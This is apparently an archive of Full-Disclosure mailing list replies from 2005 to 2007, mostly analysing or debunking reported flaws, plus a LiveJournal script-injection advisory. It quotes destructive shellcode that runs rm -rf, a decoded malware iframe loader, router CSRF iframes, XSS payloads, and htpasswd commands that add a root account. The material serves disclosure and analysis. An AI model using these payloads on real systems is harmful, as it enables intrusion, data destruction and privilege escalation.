On 20 Dec 07, at 18:51, onion ring wrote: snip char sc[] = \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x31\xC0\x89\xC3\x89\xC1\x41\xB0\x30\xCD\x80\x31\xC0\xFE\xC3\x80 \xFB\x1F\x72\xF3\x04\x40\xCD\x80\x89\xC2\x31\xC0\xB0\x02\xCD\x80 \x39\xC0\x74\x08\x31\xC0\x89\xC3\xB0\x01\xCD\x80\x31\xC0\xB0\x42 \xCD\x80\x43\x39\xDA\x74\x08\x89\xD3\x31\xC0\x04\x25\xCD\x80\x31 \xC0\x50\x68\x6F\x67\x69\x6E\x68\x69\x6E\x2F\x6C\x68\x2F\x2F\x2F \x62\x89\xE3\x31\xC0\x04\x0A\xCD\x80\x31\xC0\x50\x68\x2A\x2F\x2F \x2F\x89\xE2\x50\x68\x2D\x72\x66\x66\x89\xE1\x50\x68\x6E\x2F\x72 \x6D\x68\x2F\x2F\x62\x69\x89\xE3\x50\x52\x51\x53\x89\xE1\x31\xD2 \x04\x0B\xCD\x80; snip Abbreviated disassembly: signal(SIGHUP, SIG_IGN) something that looks like a 15-level deep fork() bomb something involving kill() unlink(/bin/login) execve(//bin/rm, {//bin/rm, -rff, *///}) You could at least try to obfuscate your constants a little better. That was way too easy. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] The Cookie Tools v0.3 -- first public release
On 10 Dec 07, at 05:45, michele dallachiesa wrote: why HTTPS is not the default in this type of services? this is a big silent hole. maybe, today is less silent :) The short version is because hosting things with SSL is still hard. There's a few things which are significantly holding back the move to SSL web servers. They include: * Every domain hosted with SSL must have a dedicated IP address. This basically rules out any form of shared hosting. * SSL certificates don't come cheap. $50 seems like the low end right now, and the really big names (like Verisign or Thawte) charge several times that. * Many common load-balancing products only work with unencrypted HTTP. Furthermore, SSL places a much higher load on the server. Some of these things are set to change - for example, SNI is set to fix the first one. However, it's only just becoming available; it'll be a while before it can be relied on in production systems. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Wordpress 2.3 Cross Domain Content Insertion- New vulnerability + exploit - xssworm.com
On 13 Nov 07, at 18:08, XSS Worm XSS Security Information Portal wrote: We have looked at coding for wp-slimstat but we cannot see any problem with input validating. Maybe some of the xssworm.com readers can show us where problem is in the php code because we cannot see any porblem here: OK, I'll bite... snip href=?page='.$_GET['page'].'panel='.$_GET[panel].''.__('Reset filters', 'wp-slimstat').'/a':).' input type=hidden name=page value='.$_GET['page'].' / input type=hidden name=panel value='.$_GET[panel].' / input type=hidden name=fd value='.$_GET[fd].' //form'; Those all look like you could escape from the tag attribute with a well-placed double quote, assuming that there's no preprocessing on $_GET. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Suspicious URL in IDS
On 03 Nov 07, at 16:24, Kelly Robinson wrote: Is the following URL valid? http://[EMAIL PROTECTED] Technically, yes. (It specifies that the client is to authenticate to www.sitenameremoved.ru with the username www.address.com.) It's often used in phishing attempts, though, as a sufficiently long username can be used to obscure the actual hostname and path. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] rPSA-2007-0212-1 util-linux
On 12 Oct 07, at 01:34, yearsilent wrote: could anybody explain this bug? I saw the git diff: - setuid(getuid()); - setgid(getgid()); + if(setgid(getgid()) 0) + die(EX_FAIL, _(umount: cannot set group id: %s), strerror(errno)); + + if(setuid(getuid()) 0) + die(EX_FAIL, _(umount: cannot set user id: %s), strerror(errno)); + not only root can do mount ? what condition could cause setuid failed ? setuid() fails if the operation would create more processes owned by the target user than the number specified by that user's process- count limit. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Report to Recipient(s)
On 09 Oct 07, at 20:04, [EMAIL PROTECTED] wrote: Sometimes I really do have to wonder about people. Obviously it wasn't a message that came from me since the blackberry.net in my email might be a good clue that I'm using a blackberry to do my emails (in case the T-Mobile tagline/nagline was an obvious enough hint as is). Now I wonder which bag of garbage spammer to thank for this since someone is obviously running around with my email addr and spaming. snip The file / html you received was infected with the Exploit- CVE2007-3845 virus and was deleted. Actually, my guess would be that a message you sent (or that you quoted!) tripped someone's virus filter. CVE2007-3845 reads: Mozilla Firefox before 2.0.0.6, Thunderbird before 1.5.0.13 and 2.x before 2.0.0.6, and SeaMonkey before 1.1.4 allow remote attackers to execute arbitrary commands via certain vectors associated with launching a file handling program based on the file extension at the end of the URI, a variant of CVE-2007-4041. NOTE: the vendor states that it is still possible to launch a filetype handler based on extension rather than the registered protocol handler. which sounds a lot like the topic that was being discussed. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox 2.0.0.7 has a very serious calculation bug
On 28 Sep 07, at 19:25, wac wrote: On 9/28/07, Jimby Sharp [EMAIL PROTECTED] wrote: How is this serious and is it related to security in any manner? If not, please do not spam. :-( Many bugs are security related (I would say all). How it is security related? Think. What happens if your bank calculates something wrong and puts the lower in your account and the higher in another account? Yes It might be little but what about a little many times? That could be done with javascript too. Then... you are not safe anymore. If your bank is doing financial calculations using Javascript in a standard web browser, you have bigger things to worry about than roundoff errors. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] python = 2.5.1 standart librairy multiples int overflow, heap overflow in imageop module
On 15 Sep 07, at 16:53, Slythers Bro wrote: The module imageop contains a lots of int overflow, which result in heap overflow, and maybe memory dump. The files imageop.c and rbgimgmodule.c are examples. snip The real question: Does anybody actually use those modules? Most Python programs that I've seen that do image processing use other methods, like PIL or calling out to Imagemagick. A bit of searching on Google Code Search didn't find me anything that actually used imageop or rgbimgmodule except test cases for those modules. rgbimgmodule isn't even part of a standard build of Python 2.5. Remember that Python is *not* a managed language - there's no guarantees of safety inherent in the language. In fact, there are easier ways to execute native code: take a look at ctypes, for example. While I'd definitely classify the behavior you've identified as a bug, it's unlikely to be exploitable in the context of any programs which use it (if, indeed, there are any). ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Beyond Security] New sudo off-by-one poc exploit.
On 05 Aug 07, at 15:48, Beyond Security wrote: /* * off by one ebp overwrite in sudo prompt parsing function * discovered by beyond security in 2007, thx ge * * to compile: gcc -pipe -o sobo sobo.c ; ./sobo * * please use responsibly! a patch has already been sent * upstream and a fix will be included in the next sudo release * */ snip Smashes its own stack and runs rm -rf ~ / . Very clever. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Does this exist ?
On 05 Jul 07, at 06:20, Dan Becker wrote: I have an idea that won't leave me alone and this list seems to have the most potential for knowing if the idea exists. My apologies for a somewhat offtopic post. Would there be a way to create a rainbow table of tcp packets to be used to generate one packet for every 1000 or so normal packets simply by matching hashes with databases on both ends ? No; for a 128-bit hash (for example) there are only 2^128 packets which can be uniquely represented. This is far below the 2^12144 1518- byte packets which are possible, so - by the pigeonhole principle, there will be collisions. Increasing the hash size won't help unless you make it at least as large as the packet, at which point you aren't gaining anything. Computing such a rainbow table is computationally impossible, anyway. The largest keyspace which I know of that's been brute-forced was somewhere around 64 bits, and that takes either dedicated hardware or a distributed-computing network. 128 bits is believed to be physically impossible, and even that is just barely enough to fit a TCP header into, without any data. If the data being transmitted over the link is reasonably redundant, then you might get lucky and be able to just hash the relevant packets ahead of time. However, you could probably do even better with a purpose-built compression scheme anyway. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] How to protect RFI ??
On 27 May 07, at 19:41, Mark Sec wrote: G00d thanks, does any1 know a tool for looking vulnerabilities inside of my *.php files ? or something to automated the search vulnerabilities? find /php/dir -name '*.php' -print0 | xargs -0 egrep '(include| require)(_once)?\(.*\$' ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] TCP/IP vulnerability
On 23 May 07, at 08:27, Mohit Kohli wrote: Thanks for the reply but have some concerns... 1)Tearn drop and land attack work on win 95 server,how to exploits this vulnerability or its variant on windows 2000 or linux. I don't know about Windows 2000, but Linux doesn't appear to have ever been affected by LAND, and Teardrop was protected against with 2.0.32. Getting a kernel that old to run will be very difficult unless you've got a copy of some *really* old distribution handy. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Is OWASP vulnerable ??
On 10 Mar 07, at 09:23, Scarlet Pimpernel wrote: Hello all, There is an undefined function in OWASP website's javascript code (wikibits.js) called wgBreakFrames. This can cause potential damage to the site if used maliciously. ... if (wgBreakFrames) { ... First of all, that's a variable, not a function. Creating a function called wgBreakFrames wouldn't execute the function. Second of all, I'm not really sure how that could be used maliciously. If you're able to inject Javascript into the window context, you can already do whatever you like to the user's browser. So I'm not quite sure how this is supposed to cause potential damage to the site. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Drive-by Pharming Threat
On 19 Feb 07, at 09:54, [EMAIL PROTECTED] wrote: I am curious as to how one automatically logs on? Memorized passwords. Also, if a password is required for a subsidiary resource, the browser will ask the user for it. In IE, at least, a sequence like the one I describe below will pop up a series of password dialogs if the user attempts to cancel. Most users will eventually try typing in the correct password to try to make the password dialogs go away. Also when you do reset or change parameters in the router, does it not require a reboot of the router (auto after you hit save), whereby your connection is lost for x amount of time? Depends on the router. It doesn't really matter much, though - once the settings are saved the damage's been done. Also not to mention find a method to cross domains into the routers html, for each and every router out there. Try them all at once: iframe src=http://192.168.0.1/csrf-for-one-router;/iframe iframe src=http://192.168.0.1/csrf-for-another-router;/iframe iframe src=http://192.168.0.1/csrf-for-a-third-router;/iframe iframe src=http://192.168.0.1/csrf-for-a-fourth-router;/iframe ... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Drive-by Pharming Threat
On 19 Feb 07, at 20:36, Gaurang Pandya wrote: just wondering why cant simple perl script be used instead?? Because it's easy to write a web page to make a user run some Flash. Making a user run Perl isn't so easy. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Digital Mechanical Lock Unsafe
On 11 Feb 07, at 15:39, Clark Mills wrote: The model of lock that this article is based on is a Lockwood DX DIGITAL LOCK. I'd expect all similarly styled locks to be similarly flawed. Nope, it's probably just that model. The digital-mechanical locks that I've seen are dependent on both the sequencing of buttons pressed (1,2,3 vs. 2,1,3) and the combinations in which buttons are pressed. Some can use codes which include button chords (1+2,3 vs. 1,2+3). ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Remove all admin-root authorization prompts from OSX
On 24 Jan 07, at 17:20, K F (lists) wrote: http://www.petitiononline.com/31337OSX/petition.html The petition reads, in part: In efforts to minimize the apparently unnecessary dialog boxes that ask for permission to go from gid=admin to uid=root we are hereby petitioning Apple to remove any further use of dialog boxes when making the transition from gid=0 to uid=0. Since the admin group is ALREADY root why can't you just stop asking us for authorization? Do your research next time. gid=admin isn't root: powerbook% id uid=1000(me) gid=1000(me) groups=1000(me), 81(appserveradm), 79 (appserverusr), 80(admin) ... it's just an ordinary group with sudo, write privileges to some special folders, and some extra SecurityAgent magic in /etc/ authorization. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] code release: cryptographic attack tool
On 12 Jan 07, at 08:05, Slythers Bro wrote: hi, sorry but i know nothing about the real physical quantic theory i'am not a physician i just know there are 3 states : 0 ,1 and unknow ... This approach won't work for anything beyond the most trivial cryptographic computations: attempting to reverse MD5 through basic logic like this will stall as soon as you come to an operation where both operands are unknown. In MD5, this will occur at the stage where the message is added to word A in the 64th round. By the time you get to the end of the 60th round, all bits will be unknown. Any attack on a cryptosystem (such as MD5) of this form will need to take into account complex correlations between bits. To carry your quantum-physics analogy a bit further, you need to be able to keep track of entanglement between bits. However, the storage necessary to carry out such an attack on a large system like MD5 may very well be large enough as to be completely infeasible (i.e, above 2^48 bits). ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] any idea what is going on here?
On 04 Jan 07, at 13:37, Ian Shaw wrote: A website that I am developing has had BackDoor-CUS!php uploaded to the images directory. My faulty entirely due to permissions set. This has resulted in html script language=javascript s=unescape(%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A% 2F%2F%77%77%77%2E%6E%6F%77%6E%61%6D%65%73%2E%6F%72%67%2F%69%6D%61% 67%65%73%2F%69%6E%2E%70%68%70%3F%61%64%76%3D%33%22%20%57%49%44%54% 48%3D%22%30%25%22%20%48%45%49%47%48%54%3D%22%30%25%22%20%4D%41%52% 47%49%4E%48%45%49%47%48%54%3D%22%30%22%20%4D%41%52%47%49%4E%57%49% 44%54%48%3D%22%30%22%20%53%43%52%4F%4C%4C%49%4E%47%3D%22%61%75%74%6F %22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%4E%4F%52%45% 53%49%5A%45%3E%3C%2F%69%66%72%61%6D%65%3E%0A); document.writeln(s);document.close(); /script /html being added to the top of index.php. Unencoded this reads iframe src= http://www.nownames.org/images/in.php?adv=3; WIDTH=0% HEIGHT=0% MARGINHEIGHT=0 MARGINWIDTH=0 SCROLLING=auto frameborder=0 NORESIZE When I go to this an applet appear to run but I am not sure what doing. Closed my browser out of fear. Does anyone know what it is attempting to do? The iframe source loads an obfuscated Javascript which, when decoded, loads a Java applet and subsequently attempts several exploits. I have disassembled the Java applet. It contains some obfuscation of its own, defining classes at runtime from inline byte arrays. It appears to exploit the Microsoft Java VM by overloading SecurityClassLoader at runtime. One is against a number of ActiveX plugins which implement CreateObject or GetObject methods which may be used to create a WScriptShell. The class IDs of the plugins in question are: {BD96C556-65A3-11D0-983A-00C04FC29E36} {BD96C556-65A3-11D0-983A-00C04FC29E36} {AB9BCEDD-EC7E-47E1-9322-D4A210617116} {0006F033---C000-0046} {0006F03A---C000-0046} {6e32070a-766d-4ee6-879c-dc1fa91d2fc3} {6414512B-B978-451D-A0D8-FCFDF33E833C} {7F5B7F63-F06F-4331-8A26-339E03C0AE3D} {06723E09-F4C2-43c8-8358-09FCD1DB0766} {639F725F-1B2D-4831-A9FD-874847682010} {BA018599-1DB3-44f9-83B4-461454C84BF8} {D0C07D56-7C69-43F1-B4A0-25F5A11FAB19} {E8CCCDDF-CA28-496b-B050-6C07C962476B} If such an plugin is found, the script loads and runs a small Windows executable. I have not fully analyzed this executable, but it appears to be a downloader which is not identified by Kapersky. It loads a third executable in MS-DOS format from another site. None of my tools can disassemble this, but Kapersky identifies it as Trojan- Downloader.Win32.Small.avw: *another* loader. Following this, the decrypted script contains part of another exploit. The exploit is truncated, so I'm not sure exactly what it's targeting. There's a lot of Unicode shellcode escaping going on, but the final attack is missing. This may be due to a bug in the decryption routine. All files are available on request, if anyone's interested in doing some further analysis of their own. That was fun :) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache 1.3.37 htpasswd buffer overflow vulnerability
On 02 Jan 07, at 12:20, Matias Soler wrote: Synopsis: Apache 1.3.37 htpasswd buffer overflow vulnerability Version: 1.3.37 (latest 1.3.xx) Product === Apache htpasswd utility Issue = A buffer overflow vilnerability has been found, it is dangerous only on environment where the binary is suid root. If htpasswd is setuid, then one could just as easily: htpasswd -bp /etc/passwd toor x:0:0:toor::/:/bin/sh htpasswd -bp /etc/shadow toor xxa8fjDF6WqBA:0:0:9:7::: and get root. (Or any number of things - sudoers, crontab, SSH keys - take your pick.) It's possible that this buffer overflow may be significant in very limited circumstances - if the utility is executed from a web application, perhaps. However, this seems like a rather limited-scope issue. -- Andrew Farmer ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Call For Participants For A Research Study Of Hacker Culture
On 08 Dec 06, at 12:47, Evan Stawnyczy wrote: ^ My name is Evan ($LastNameNotDisclosed$). Nice job with the last-name-non-disclosure. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [x0n3-h4ck.org] PayPal vulnerable to XSS
On 04 Nov 06, at 11:39, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: this is a request, that I have passed server to the web, complete of the code that would allow the xss: GET / HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.paypal.com Cookie: cookie_check=yes;feel_cookie= snip big session cookies LANG=--ScRiPt%20%0a%0dalert(1234567890)%3B/ScRiPt snip more cookies Connection: Close Pragma: no-cache That's not exploitable. Remember that the XS in XSS stands for cross-site: you have to be able to trigger the scripting using ordinary requests from another site. To generate this cookie, you'd need to already have scripting access to the paypal.com domain - in which case you don't care anymore. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Plague Proof of Concept Linux backdoor
On 22 Oct 06, at 04:29, [EMAIL PROTECTED] wrote: even if they have ssh access, there is still nothing they can do, except to create two files in there $HOME directories containing expressions from paths.h and sysexits.h ? Why would that be considered a backdoor? The awk commands parse out the strings /etc/passwd and /etc/ shadow from the headers. It's still rather easily detected - most of the rootkit- checking programs will detect an alternate uid0 account very quickly - but it does demonstrate an interesting way of avoiding target strings in the binary. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Googling:Google Meta Bugs
On 10 Oct 06, at 18:29, Aditya Sood wrote: This post deals with the googling effects that google provide with its search engine.Since in searching algorithms the metacharacters are handled with proper filtering techniques which we have not seen it in google.Already explanation given to google but i think they are getting googled not to handled these unexceptional searches.What we call it... I tried several of the searches listed, and observed no unusual behavior in the search results. A number of the searches yielded very few results due to misspelled keywords (like filtetype). Have you really tried any of these searches, or are you just generating queries at random? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Googling:Google Meta Bugs
On 11 Oct 06, at 08:07, Aditya Sood wrote: Hey what ever you suppose to. Well if google has accepted it so better you should too. Check Down : Response from google Well i dont want to say anything more about nerd talk. Better to accept new stuff ok not stoic Original Message Subject: Re: [#55295087] Flaw In Google Search Engine From: [EMAIL PROTECTED] Date: Fri, April 28, 2006 11:38 am To: Aditya Sood [EMAIL PROTECTED] - - Thank you for your note. Please rest assured that Google never inserts jokes or sends messages by changing the order of its results. Occasionally, when a particular website is the subject of public attention, other sites begin linking to it. This may elevate its importance as gauged by our ranking software, which assigns a PageRank value based in part on who links to a given page. Higher ranking in Google results may lead to more awareness, which may lead to more links and so on. One side effect of not using an editorial viewpoint to determine the ranking of results is that anomalies occasionally occur. We view such occasions as opportunities for us to learn more about how the web works and how to improve our algorithms for all searches in the future. Regards, The Google Team Translation: Nothing to see here, move along. Google hasn't accepted anything in that response. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Googling:Google Meta Bugs
On 10 Oct 06, at 19:53, Aditya Sood wrote: Andrew Farmer wrote: On 10 Oct 06, at 18:29, Aditya Sood wrote: This post deals with the googling effects that google provide with its search engine.Since in searching algorithms the metacharacters are handled with proper filtering techniques which we have not seen it in google.Already explanation given to google but i think they are getting googled not to handled these unexceptional searches.What we call it... I tried several of the searches listed, and observed no unusual behavior in the search results. A number of the searches yielded very few results due to misspelled keywords (like filtetype). Have you really tried any of these searches, or are you just generating queries at random? A] Do check you are making search with advanced IM Feeling Lucky Button B] Its all working previously and have been reported to google.May be they have set changes but do try it will provide results which is not at all possible for search engines. I tried several of the suggested queries again, both with and without I'm Feeling Lucky. None of them produced any anomalous behavior. What are we supposed to be looking for, exactly? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] repeated port 21 attempts
On 6/13/06, Ken Dunham [EMAIL PROTECTED] wrote: I'm getting port 21 connection attempts every 5 minutes from about half a dozen of my network users. Hi, Sounds like FTP and SSH attacks that are opportunistically launched by Romanian attackers to date... Given that the connections coming from his own network, I seriously doubt the FTP connection attempts are the work of Romanian hackers. (Unless Mr. Wu's network is in Romania.) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: Re: [Full-disclosure] repeated port 21 attempts
On 6/13/06, Jacob Wu [EMAIL PROTECTED] wrote: They are all non routable 10.x.x.x IPs. This is for a residence hall at my University. Residents, when they first turn on their computers, are given a 10.x.x.x IP and made to register and agree with the network use policy. Once they do that they are given a real IP and thus access to the internet. Are you doing something weird with DNS that's making this one machine's address to show up on lookups, or messing with routing so that everything gets redirected to this box? If so, I'd wonder if this is some sort of bot that you're seeing that's trying to call home with FTP. It might behoove you to (kindly) ask the owner of one of the machines to let you take a look at their machine to see what it's doing. Someone sent me this link: Try websnarf: http://www.unixwiz.net/tools/websnarf-1.04 But it gives me less information than iptables does. You may have to modify it to better imitate an FTP server - it was written for use as a faux HTTP server. In particular, the client may be waiting for a banner and/or greeting before it makes a request. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Advisory - D-Link Access Point
On 06 Jun 06, at 18:10, news wrote: INTRUDERS TIGER TEAM SECURITY - SECURITY ADVISORYhttp:// www.intruders.com.br/http://www.intruders.org.br/ADVISORY/0206 - D- Link Wireless Access-Point (DWL-2100ap)PRIORITY: HIGHI - INTRUDERS:Intruders Tiger Team Security is a project entailed with Security Open Source (http:// www.securityopensource.org.br).The Intruders Tiger Team Security (ITTS) is a group of researchers with more than 10 years of experience, specialized in the development of intrusion projects (Pen-Test) and in special security projects.All the projects of intrusion (Pen-Test) realized until the moment by the Intruders Tiger Team Security had 100% of success.II - INTRODUCTION:--D-Link AirPlus XtremeG 2.4GHz Wireless Access Point, 54Mbps/108Mbps (802.11g):D-Link, the industry pioneer in wireless networking, introduces a performance breakthrough in wireless connectivity – D-Link AirPlus Xtreme GTM series of high-speed devices now capable of delivering transfer rates up to 15x faster than the standard 802.11b with the new D- Link 108G. With the new AirPlus Xtreme G DWL-2100AP Wireless Access Point, D-Link sets a new standard for wireless access points.D-Link DWL-2100ap is one of the most popular Access Point in the world Wall of text hits you for 652275 damage. You die. PGP.sig Description: This is a digitally signed message part ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Is your security 6/6/6 ready?
On 04 Jun 06, at 15:13, Aaron Gray wrote: (*) That's *really* drunk: http://www.eforu.com/jokes/bartender/ 23.html That contains (possibly multiple) IE exploits. Are you sure? All I can see is tacky ads... an IFRAME tag does not an exploit make. PGP.sig Description: This is a digitally signed message part ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] -Advisory- + x Thu Mar 16 21:01:19 EST 2006 x + Heap Overflow in Microsoft Excel
-Advisory- + x Thu Mar 16 21:01:19 EST 2006 x + Heap Overflow in Microsoft Excel o/ å Description It is possible to make Microsoft Excel crash or run arbitrary code by the use of malformed input. Contact Andrew Farmer [EMAIL PROTECTED] CISSP CSFA SSP-CNSA SSP-MPA GIPS GWAS CAP ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Promiscious Device Detection
On 09 Mar 06, at 04:04, Q Beukes wrote: I am looking for linux utility that checks if a specified machine's network device is in promiscious mode or not. c source is prefered so I could maybe modify (if needed) it so it actively search for such devices and syslog such finds. You can't search for promisc devices, as they don't advertise them- selves in any way. Chkrootkit[1], though, will check the local machine for a promisc interface, as well as other signs of possible badness. [1]: http://www.chkrootkit.org/ PGP.sig Description: This is a digitally signed message part ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fun with Foundstone
And while we're at it... https://download.foundstone.com/?o=;scriptalert(xss)/script PGP.sig Description: This is a digitally signed message part ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] cPanel 10 File Editing Vulnerability
On 04 Feb 06, at 09:16, Shell wrote: In cPanel 10, the script erredit.html, which is supposed to edit a specific set of files, can edit any file acessible by the cPanel. Example: http://www.example.com:2082/frontend/x/err/erredit.html? dir=public_html/file=index.php Tested on a real cPanel system running cPanel 10.8.1-RELEASE. This won't edit files outside the user's home directory, even with traversal paths, and deletes files before writing them - this doesn't appear exploitable; indeed, it doesn't seem to be much except a weird way of editing your own files. PGP.sig Description: This is a digitally signed message part ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] LiveJournal CSS/JS injection vulnerability
SUMMARY -- The popular Livejournal[1] social networking software contained an error which allowed for the inclusion of Javascript in user-supplied content. [1] http://www.livejournal.org/, http://www.livejournal.com/ BACKGROUND -- LiveJournal is an online journal service with an emphasis on user interaction.[2] It has historically had a relatively restrictive attitude toward user-supplied web content, opting to not allow users to include active content such as embedded plugins and scripts. This attitude has generally prevented the creation and spread of malicious content, such as the two worms which appeared on MySpace in recent months. However, this position also requires that content be carefully parsed - and a recent discovery showed that their code has its issues. [2] http://www.livejournal.com/support/faqbrowse.bml?faqid=56 DESCRIPTION -- Livejournal parses all user-supplied HTML through a script called cleanhtml.pl (located at livejournal/cgi-bin/cleanhtml.pl). All HTML attributes containing the literal text 'javascript' are stripped by default. However, if the cleancss option is enabled - which it is in most installations, including the one at livejournal.com - style attributes will have slashes stripped after the check for the text 'javascript' is made, causing a style property containing the text 'java\script' to be modified to 'javascript' and passed through. As many web browsers allow javascript: to be used as a pseudo-URI, this allows for the creation of content that will execute arbitrary script code on a user's browser when viewed. For example, the HTML content span style=background:url('javas\cript:(function x(){alert(quot;booquot;)})();');test/span will be accepted by an unpatched LiveJournal installation; the slash will be removed, causing a dialog to be displayed when the content is viewed. FIXES -- As of 7 Dec 2005, LiveJournal CVS contains a fix to this issue: cleanhtml.pl now searches for the text 'javascript' in CSS *after* stripping slashes: --- cgi-bin/cleanhtml.pl22 Oct 2005 03:17:05 - 1.129 +++ cgi-bin/cleanhtml.pl7 Dec 2005 08:50:41 - 1.130 @@ -319,7 +319,7 @@ $hash-{$attr} =~ s/\\//g; # and catch the obvious ones ([ is for things like document[coo+kie] -foreach my $css (/*, [, qw(absolute fixed expression eval behavior cookie document window)) { +foreach my $css (/*, [, qw(absolute fixed expression eval behavior cookie document window javascript)) { if ($hash-{$attr} =~ /\Q$css\E/i) { delete $hash-{$attr}; next ATTR; All sites using the LiveJournal code are urged to upgrade, or apply this patch, as soon as possible. ACKNOWLEDGEMENTS -- The author would like to acknowledge Hoshikuzu Stardust (st4rdust at gmail.com) for reporting a related issue involving the escaping of control characters in CSS; this vulnerability was discovered during experimentation and testing regarding that issue. HISTORY -- Discovery: circa 5 Dec 2005 Vendor notified: 5 Dec 2005 Patch implemented: 7 Dec 2005 Public disclosure: 19 Dec 2005 AUTHOR -- Andrew Farmer is a student at Harvey Mudd College. PGP.sig Description: This is a digitally signed message part ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: readdir_r considered harmful
